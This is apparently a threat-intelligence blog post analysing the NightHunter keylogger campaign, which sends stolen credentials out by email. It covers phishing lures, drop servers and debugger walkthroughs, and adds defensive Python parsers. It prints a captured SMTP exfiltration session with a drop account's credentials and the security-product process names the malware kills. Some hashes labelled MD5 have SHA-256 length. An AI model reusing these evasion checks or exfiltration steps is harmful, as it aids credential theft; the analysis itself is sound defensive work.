Cyphort Labs discovered an extensive data theft campaign. It involves several different malware keyloggers, including Predator Pain, Limitless, Spyrex and others. The unifying feature is that they all use SMTP (email) for data exfiltration. Email is to social networking what snail mail is to email: outdated and often overlooked, which makes it a stealthier channel for data theft. So we called it NightHunter.
NightHunter is very aggressive at stealing users’ passwords and sending them home. The actors behind NightHunter could apply big data analytics to the trove of stolen credentials to enable new cyber threats: extortion, credit card or bank fraud, theft of state secrets, or corporate espionage.
Our investigation started with a sample delivered through a phishing email. It is a .NET binary; when executed it steals the user’s credentials and sends them to a remote email server. This looks like a naive technique to most of the existing “advanced” security products. We looked into the sample, found additional “similar” samples, and examined the data they exfiltrated to the remote servers.
The NightHunter data theft campaign is believed to have been active since at least 2009, targeting energy firms, educational institutions, hospitals, charities and other enterprises.
Common Delivery Mechanism:
These samples are delivered mostly through phishing emails with DOC/ZIP/RAR attachments; a victim gets infected by opening a malicious document with scripting enabled. The phishing emails are mostly targeted at personnel in finance, sales and HR departments, and the actors sometimes pose as goods resale agents. We have also seen cases where the malware was bundled with fake IDM/7zip installers. Most of these samples use keylogger tools to sniff data from the victim.
Most common Phishing Email subject/attachment names:
- WireSlip
- Jobs List
- PO
- Reconfirm Pls
- Purchase Order
- Payment Slip
- Order
- Inquiry
- Remittance Payment Slip
Types of Stolen Credentials:
- Dropbox
- Yahoo
- Hotmail
- Amazon
- Skype
- Banks
- Rediff
Victim Industries:
- Oil industry
- Charities
- Educational Institutes
- Hospitals
- Departmental Stores
- Auditors
- Export/Import Companies
- Insurance Companies
- TV Network
- Trading Companies
List of keylogger malware used:
- Limitless logger lite (http://limitlessproducts.org/)
- Predator Pain
- Keylogger Logları (SlloTBan)
- Spyrex
- FEDERIKO’s Logger
- Unknown Logger Public
- Aux Logger
- Neptune
- Clyde Logger
- Ultimate Logger
- MY Ultimate Jobe
- Syslogger
- Syndicate Logger (http://syndicateproducts.org)
We are seeing the Limitless keylogger in many places. After Limitless, Predator Pain is the most popular tool among the actors: considering its low cost, easy setup, the quality of its virus generator and the features it supports, we are seeing increasing interest in it from the actors. Though Limitless Logger is now closed down, it was used heavily.
Most of the keyloggers used provide the following features:
- E-Mail/PHP/FTP upload
- Obfuscation
- Spoof Extension and Change Icon
- Clear Browser Data
- Fake Error Message
- Capture Screenshot
- Disable many programs
- Various spreading mechanisms
- File Downloader
- Block various websites
- Self-delete
Data Stealing:
- Bitcoin Stealing
- Password managers
- Firefox/Google Chrome/IE/Safari/Opera
- Outlook
- Pidgin/Trillian/Paltalk/AIM/IMVU
- Various Games and Game Bots
- Filezilla/Flashfxp/CoreFTP/SmartFTP/FTP Commander
One of the samples (f997f9bdf00d82a42cb0985c803a0ba1ba0c7faf0b69b0d4a1888f6d1f46d210), even printed out the activity details to the console.
List of email servers and the number of samples using each email server:

| Email Server | Sample Count | First Seen | Last Seen |
|---|---|---|---|
| smtp.googlemail.com/smtp.gmail.com | 300k | 2009 | Today |
| smtp.mail.ru | 228 | 2010-10-08 | 2014-06-13 |
| smtp.live.com | 151 | 2010-08-24 | 2014-06-12 |
| mx1.3owl.com | 82 | 2012-09-10 | 2014-06-05 |
| smtp.mail.com | 42 | 2011-04-20 | 2014-06-12 |
| smtp.yandex.com/smtp.yandex.ru | 39 | 2010-12-20 | 2014-06-12 |
| smtp.turkceventrilo.com | 38 | 2014-04-02 | 2014-06-04 |
| smtp.mail.yahoo.com | 25 | 2013-02-15 | 2014-06-13 |
| mail.drmike.com.de | 31 | 2014-04-06 | 2014-05-29 |
| smtp.aol.com | 13 | 2010-10-27 | 2014-06-06 |
| smtp.comcast.net | 18 | 2013-05-31 | 2014-06-12 |
| smtp-mail.outlook.com | 1 | 2014-05-23 | |
| smtp.list.ru | 1 | 2014-06-09 | |
| smtp.hanco-ltd.biz | 10 | 2014-04-04 | 2014-06-10 |
| mail.ieindia.org | 7 | 2014-04-29 | 2014-06-10 |
| mail.npcuae.com | 1 | 2014-06-08 | |
| smtp.bilatraders.com | 1 | 2014-06-04 | |
| mail.persian-trading.com | 5 | 2014-05-25 | 2014-06-06 |
| smtp.poczta.onet.pl | 2 | 2012-06-02 | 2014-06-09 |
| relay.skynet.be | 1 | 2014-06-04 | |
| Smtp.interia.pl | 1 | 2014-06-06 | |
| mx.freenet.de | 1 | 2014-06-05 | |
| cloud73.dotcanada.com | 2 | 2014-04-29 | 2014-05-30 |
| smtp.bk.ru | 5 | 2014-04-21 | 2014-05-26 |
| master.torguard.tg | 3 | 2014-05-16 | 2014-05-23 |
| poczta.o2.pl | 4 | 2014-03-21 | 2014-05-31 |
| smtp.web.de | 2 | 2011-07-03 | 2014-04-11 |
| mail.snookiezinc.com.de | 1 | 2014-03-18 | |
| mail.atbinco.com | 2 | 2014-05-09 | |
| smtps.bol.com.br | 2 | 2014-04-15 | 2014-05-26 |
| mail.glintcosmetics.com | 2 | 2014-04-25 | 2014-06-11 |
Gmail seems to be the most popular email server used by the criminals to “park” the victim data in recent times. The probable reason for the larger number of samples that use Gmail is that it is quite popular, most security products somehow “whitelist” Google/Gmail traffic and activity, and it is easy to hide these messages in the volume of email sent to Gmail. Another possible reason is that Gmail imposes a lot of restrictions, such as how many emails a particular account can send on a given day, so the actors have to keep sending out new malware with new accounts.
The number of samples the actors sent for other email servers is very low. We believe some of the servers were hacked to create an email account, and in some cases the actors set up their own email server. For example, the email server of The Institution of Engineers (ieindia.org) was hacked to create two accounts, which were used to park victim data mostly from India. Some of the samples that use private email servers were active for only a few weeks.
Most of the virus generator tools provide various options to exfiltrate data from the victim machine, such as email, FTP and PHP upload. Looking at the patterns, most of these actors started with PHP upload and then moved to email. Analyzing recent malware samples reveals that most of the actors now use only email; very few malware samples use multiple exfiltration methods, such as FTP and email together.
mx1.3owl.com:

| First Seen Date | Infection Count | Keylogger |
|---|---|---|
| 6/5/2014 | 2 | Predator Pain |
| 6/4/2014 | 31 | Predator Pain |
| 6/4/2014 | 47 | Predator Pain |
| 6/3/2014 | 10 | Predator Pain |
| 6/3/2014 | 15 | Predator Pain |
| 6/3/2014 | 33 | Predator Pain |
| 6/2/2014 | 2 | Predator Pain |
| 6/2/2014 | 50 | Predator Pain |
| 6/2/2014 | 2 | Predator Pain |
| 6/1/2014 | 33 | Predator Pain |
| 5/30/2014 | 7 | Predator Pain |
| 5/25/2014 | 44 | Predator Pain |
| 5/20/2014 | 6 | Predator Pain |
| 5/17/2014 | 5 | Mr. Clyde Logger and Predator |
| 5/15/2014 | 26 | |
| 5/12/2014 | 5 | Mr. Clyde Logger and Predator |
| 5/11/2014 | 39 | Predator Pain |
| 5/8/2014 | 59 | Predator Pain |
| 5/7/2014 | | |
| 5/6/2014 | 6 | Predator Pain |
| 5/2/2014 | 20 | Predator Pain, Limitless Logger |
| 4/24/2014 | 37 | Predator Pain |
| 4/23/2014 | 57 | Predator Pain, Limitless Logger |
| 4/22/2014 | 57 57 | Predator Pain, Limitless Logger Predator Pain, Limitless Logger, MY Ultimate Jobe |
| 4/17/2014 | 57 57 14 | Predator Pain, Limitless Logger Predator Pain, Limitless Logger, MY Ultimate Jobe Predator Pain |
| 4/16/2014 | | |
| 4/15/2014 | 1 | Predator Pain |
| 4/10/2014 | 73 | Predator Pain, Limitless Logger |
| 4/9/2014 | 73 | Predator Pain, Limitless Logger Limitless Logger |
| 4/5/2014 | 57 | Predator Pain, Limitless Logger Limitless Logger Predator Pain, Limitless Logger |
| 4/3/2014 | 42 | |
| 3/27/2014 | 73 | |
| 2/18/2014 | 1 | Predator Pain |
| 1/28/2014 | 57 | Predator Pain, Limitless Logger, MY Ultimate Jobe |
The actors behind these malware samples (35 out of 82) follow similar techniques when registering domains; the registrant’s identity is hidden from the analyst.
List of samples we looked into that are related to mx1.3owl.com:
mail.ieindia.org:
All the samples related to this email server were active for only a few weeks. They target people in India, and the actors used the Limitless logger to extract information from the victims. We believe the actors hacked into the organization’s email server and created two email accounts to park their data. The victims are from different industries.
Manual Analysis
Most of the samples we manually analyzed include a lot of obfuscation techniques meant to delay analysis. We will be looking at the static analysis details of this sample (MD5: cfb72c025bc99733a7f0c21242738a57) and other related samples.
Anti-analysis techniques used:
- Non-printable characters used as class/variable names in the code.
- Assembly.Load() used to load a different assembly at runtime.
- Strings in the code encoded using various methods (we found almost 10 different ones).
- Various security product detection code.
- Debugger detection code.
We started to look into the binary using various .NET disassemblers; most of them did not work on most of the binaries. Using ILSpy we were able to analyze this binary. Internally it decodes another assembly from its resource section and loads it.
We decided to dump the second stage using WinDbg. Most first-stage binaries do not use any debugger detection or security product detection code, but the second stage does.
```
0:000> sxe ld:mscorlib
0:000> sxe ld:mscorjit
0:000> g
0:000> .loadby sos mscorwks
0:000> !bpmd mscorlib.dll System.AppDomain.Load
0:000> g
0:000> !clrstack -a
OS Thread Id: 0xc64 (0)
ESP EIP
0045ed38 67f0736c System.AppDomain.Load(Byte[])
PARAMETERS:
this = 0x02851268
rawAssembly = 0x02879c04
LOCALS:
<no data>
0045ed3c 00341c55 jhgfdertyui.iuytrdfghj.Form1_Load(System.Object, System.EventArgs)
PARAMETERS:
this = <no data>
sender = <no data>
e = <no data>
LOCALS:
<no data>
0x0045ed3c = 0x02879c04
0:000> !da 0x02879c04
Name: System.Byte[]
MethodTable: 67ac37b8
EEClass: 6787eb8c
Size: 32268(0x7e0c) bytes
Array: Rank 1, Number of elements 32256, Type Byte
Element Methodtable: 67ac3868
[0] 02879c0c
…
[32255] 02881a0b
0:000> .writemem c:\tmp\secondstage.bin 02879c0c L0n32255
Writing 7dff bytes…………….
```
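Before feeding the bytes written by .writemem to ILSpy, it is worth confirming that the dump really is a managed PE (a wrong start address or length yields a truncated file that decompilers reject without a useful error). The following is an added example, not code from the original post: it walks the DOS, PE and optional headers and checks data directory index 14 (the CLR header). The function names are ours, and the test input is a constructed header, not a real sample.

```python
import struct

def is_managed_assembly(data):
    """Return True if `data` is a PE image whose optional header carries a
    CLR (COM descriptor) data directory entry, i.e. a .NET assembly."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return False
    opt_off = e_lfanew + 24  # optional header follows the 20-byte COFF header
    size_opt = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    if size_opt < 2 or opt_off + size_opt > len(data):
        return False
    magic = struct.unpack_from("<H", data, opt_off)[0]
    if magic == 0x10B:    # PE32: NumberOfRvaAndSizes at +92, directories at +96
        count_off, dirs_off = opt_off + 92, opt_off + 96
    elif magic == 0x20B:  # PE32+: NumberOfRvaAndSizes at +108, directories at +112
        count_off, dirs_off = opt_off + 108, opt_off + 112
    else:
        return False
    n_dirs = struct.unpack_from("<I", data, count_off)[0]
    clr_entry = dirs_off + 14 * 8  # IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR is index 14
    if n_dirs < 15 or clr_entry + 8 > opt_off + size_opt:
        return False
    clr_rva, clr_size = struct.unpack_from("<II", data, clr_entry)
    return clr_rva != 0 and clr_size != 0

def build_constructed_pe(managed):
    """Build a minimal, constructed PE32 header (headers only, not a real
    sample) with or without a CLR directory entry, to exercise the check."""
    dos = bytearray(0x80)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)  # e_lfanew: PE signature at 0x80
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)  # PE32 magic
    struct.pack_into("<I", opt, 92, 16)    # NumberOfRvaAndSizes
    if managed:
        struct.pack_into("<II", opt, 96 + 14 * 8, 0x2008, 72)  # CLR header RVA, size
    return bytes(dos) + coff + bytes(opt)

if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read()  # e.g. the file written by .writemem
    print("managed assembly" if is_managed_assembly(blob) else "not a .NET PE")
```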
The second stage binary is again obfuscated. It uses many variables with non-printable characters, so we are not able to set breakpoints in WinDbg, and we decided to do dynamic analysis on the binary instead. This binary persists on the system through an autorun registry modification. It first connects to a remote server (which one depends on the binary) to find the external IP address, then sends an email to the remote server.
It connects to a remote email server (mx1.3owl.com) and sends an email with the victim information. It uses the Predator Pain v14 keylogger. We extracted the email credentials from the network traffic.
Let’s look at other similar binaries that include the credentials in plain text in the original sample itself.
MD5: 3d7fee36dcd7f1e6bed77d6d9648ada5d899d3efc8dc1d1fd605f75c065cf84d
This sample hides the email credentials at the end of the file.
Some binaries look for a few security products installed on the machine. If they find any, they hide their own window and kill the security product’s process as well.
All of this detection looks for particular process names:
```
AntiKeyscrambler() -> keyscrambler
AntiWireshark() -> wireshark
AntiAnubis() -> anubis
AntiMalwarebytes() -> mbam
AntiKaspersky() -> avp
AntiOllydbg() -> ollydbg
AntiOutpost() -> outpost
AntiNorman() -> npfmsg
AntiBitDefender() -> bdagent
AntiNOD32() -> egui
```
We used WinDbg to dump the credentials for some of the samples that did not do debugger detection, breaking on the System.Net.NetworkCredential constructor:
```
0:000> sxe ld:mscorlib
0:000> sxe ld:mscorjit
0:000> sxe ld:System.Windows.Forms.dll
0:000> g
ModLoad: 00000000`6f680000 00000000`6fb4e000 System.Windows.Forms.dll
ntdll!ZwMapViewOfSection+0xa:
00000000`77a6153a c3 ret
0:000> .loadby sos mscorwks
0:000> .symfix
0:000> ld system_ni
0:000> !bpmd System.dll System.Net.NetworkCredential..ctor
0:000> !bpmd System.dll System.Net.NetworkCredential..ctor
Found 4 methods…
Setting breakpoint: bp 000007FEEA84F490 [System.Net.NetworkCredential..ctor()]
Setting breakpoint: bp 000007FEEA3D6B10 [System.Net.NetworkCredential..ctor(System.String, System.String)]
Setting breakpoint: bp 000007FEEA84F4A0 [System.Net.NetworkCredential..ctor(System.String, System.String, System.String)]
Setting breakpoint: bp 000007FEEA84F4C0 [System.Net.NetworkCredential..ctor(System.String, System.String, System.String, Boolean)]
0:000> g
Breakpoint 1 hit
System_ni+0x236b10:
000007fe`ea3d6b10 53 push rbx
0:000> !dumpobj -nofields rdx
Name: System.String
MethodTable: 000007feeb007d90
EEClass: 000007feeac0e560
Size: 66(0x42) bytes
(C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll)
String: alinsterpu@gmail.com
0:000> !dumpobj -nofields r8
Name: System.String
MethodTable: 000007feeb007d90
EEClass: 000007feeac0e560
Size: 46(0x2e) bytes
(C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll)
String: hainerosii
```
Most of the binaries used TCP/587 to send emails to the remote server; some binaries associated with mx1.3owl.com used TCP/2525. We retrieved most of the credentials using dynamic analysis, including the Gmail ones. Gmail uses an encrypted channel (STARTTLS) to communicate with the remote server, and since the number of samples that use Gmail is high, we decided to MITM the Gmail traffic in our malware lab.
```
S->C 53 b'220 mx.google.com ESMTP ec2sm20231912pbc.63 - gsmtp\r\n'
C->S 16 b'EHLO test-PC\r\n'
S->C 137 b'250-mx.google.com at your service, [67.188.0.147]\r\n250-SIZE 35882577\r\n250-8BITMIME\r\n250-STARTTLS\r\n250-ENHANCEDSTATUSCODES\r\n250 CHUNKING\r\n'
C->S 10 b'STARTTLS\r\n'
S->C 30 b'220 2.0.0 Ready to start TLS\r\n'
Wrapping sockets.
C->S 16 b'EHLO test-PC\r\n'
S->C 178 b'250-mx.google.com at your service, [67.188.0.147]\r\n250-SIZE 35882577\r\n250-8BITMIME\r\n250-AUTH LOGIN PLAIN XOAUTH XOAUTH2 PLAIN-CLIENTTOKEN\r\n250-ENHANCEDSTATUSCODES\r\n250 CHUNKING\r\n'
C->S 41 b'AUTH login YWxpbnN0ZXJwdUBnbWFpbC5jb20=\r\n'
S->C 18 b'334 UGFzc3dvcmQ6\r\n'
C->S 18 b'aGFpbmVyb3NpaQ==\r\n'
S->C 20 b'235 2.7.0 Accepted\r\n'
C->S 34 b'MAIL FROM:<alinsterpu@gmail.com>\r\n'
S->C 42 b'250 2.1.0 OK ec2sm20231912pbc.63 - gsmtp\r\n'
C->S 32 b'RCPT TO:<alinsterpu@gmail.com>\r\n'
S->C 42 b'250 2.1.5 OK ec2sm20231912pbc.63 - gsmtp\r\n'
C->S 6 b'DATA\r\n'
S->C 43 b'354 Go ahead ec2sm20231912pbc.63 - gsmtp\r\n'
C->S 228 b'MIME-Version: 1.0\r\nFrom: alinsterpu@gmail.com\r\nTo: alinsterpu@gmail.com\r\nDate: 17 Jun 2014 01:25:48 +0530\r\nSubject: New keylogger logs!\r\nContent-Type: text/plain; charset=us-ascii\r\nContent-Transfer-Encoding: quoted-printable\r\n\r\n'
C->S 48 b'keylogger started at: 6/17/2014 1:24:43 AM=0D=0A'
```
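Once STARTTLS has been stripped in the lab, everything in the session above is plain SMTP and the AUTH LOGIN exchange is only base64, so the drop account and its password can be recovered directly from the capture. The following is an added example, not code from the original post: a parser for the C->S / S->C transcript format that pulls out the AUTH LOGIN credentials, envelope addresses and Subject, and flags the two traits visible above (a self-addressed message and a “keylogger” subject line). The capture it runs on is constructed, with placeholder credentials rather than values from any real sample.

```python
import ast
import base64
import re

def _b64(text):
    return base64.b64encode(text.encode()).decode()
# Constructed capture in the same C->S / S->C form as the transcript above;
# the account and password are placeholders, not values from any real sample.
DROP_USER, DROP_PASS = "drop-account@example.com", "placeholder-password"
SAMPLE_CAPTURE = "\n".join([
    "S->C 26 b'220 mx.example.net ESMTP\\r\\n'",
    "C->S 16 b'EHLO test-PC\\r\\n'",
    "C->S 45 b'AUTH login " + _b64(DROP_USER) + "\\r\\n'",
    "S->C 18 b'334 UGFzc3dvcmQ6\\r\\n'",  # challenge decodes to "Password:"
    "C->S 30 b'" + _b64(DROP_PASS) + "\\r\\n'",
    "S->C 20 b'235 2.7.0 Accepted\\r\\n'",
    "C->S 36 b'MAIL FROM:<" + DROP_USER + ">\\r\\n'",
    "C->S 34 b'RCPT TO:<" + DROP_USER + ">\\r\\n'",
    "C->S 6 b'DATA\\r\\n'",
    "C->S 61 b'MIME-Version: 1.0\\r\\nSubject: New keylogger logs!\\r\\n\\r\\n'",
])
LINE_RE = re.compile(r"^(C->S|S->C)\s+\d+\s+(b'.*')$")

def parse_smtp_capture(text):
    """Walk the client side of a logged SMTP session and recover the drop
    account, its AUTH LOGIN password, envelope addresses and Subject."""
    result = {"username": None, "password": None, "mail_from": None,
              "rcpt_to": [], "subject": None, "indicators": []}
    expect_password = False
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m or m.group(1) != "C->S":
            continue
        # the payload is a Python bytes repr; literal_eval turns it back into bytes
        payload = ast.literal_eval(m.group(2)).decode("ascii", "replace")
        for cmd in filter(None, payload.split("\r\n")):
            upper = cmd.upper()
            if expect_password:  # the client line following the 334 challenge
                result["password"] = base64.b64decode(cmd).decode()
                expect_password = False
            elif upper.startswith("AUTH LOGIN "):
                result["username"] = base64.b64decode(cmd.split()[2]).decode()
                expect_password = True
            elif upper.startswith("MAIL FROM:"):
                result["mail_from"] = cmd.split("<", 1)[1].rstrip(">")
            elif upper.startswith("RCPT TO:"):
                result["rcpt_to"].append(cmd.split("<", 1)[1].rstrip(">"))
            elif upper.startswith("SUBJECT:"):
                result["subject"] = cmd.split(":", 1)[1].strip()
    # traits seen in the NightHunter session: self-addressed mail, keylogger subject
    if result["mail_from"] and result["mail_from"] in result["rcpt_to"]:
        result["indicators"].append("self-addressed")
    if result["subject"] and "keylogger" in result["subject"].lower():
        result["indicators"].append("keylogger-subject")
    return result
```

The recovered account is what you hand to the mail provider for takedown; the indicators are the cheap things to alert on in outbound SMTP logs (TCP/587 or TCP/2525) from hosts that should not be sending mail at all.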
One of the samples we analyzed (MD5: 8962ca1997193be3931c41983cc4600e941d40bdb0fdddafa00f3761feeb4ba8) used both email and FTP to exfiltrate data from the user’s machine.
Most of the samples used code-level obfuscation to delay analysis. In the end we found 10 different (decoding/decryption) methods used to decode various strings. No wonder: these samples are created with similar virus generator tools.
NightHunter is a unique campaign in that it tries to fly under the radar with its email exfiltration but is very aggressive at collecting all sorts of data and credentials from the users including passwords, screenshots, etc.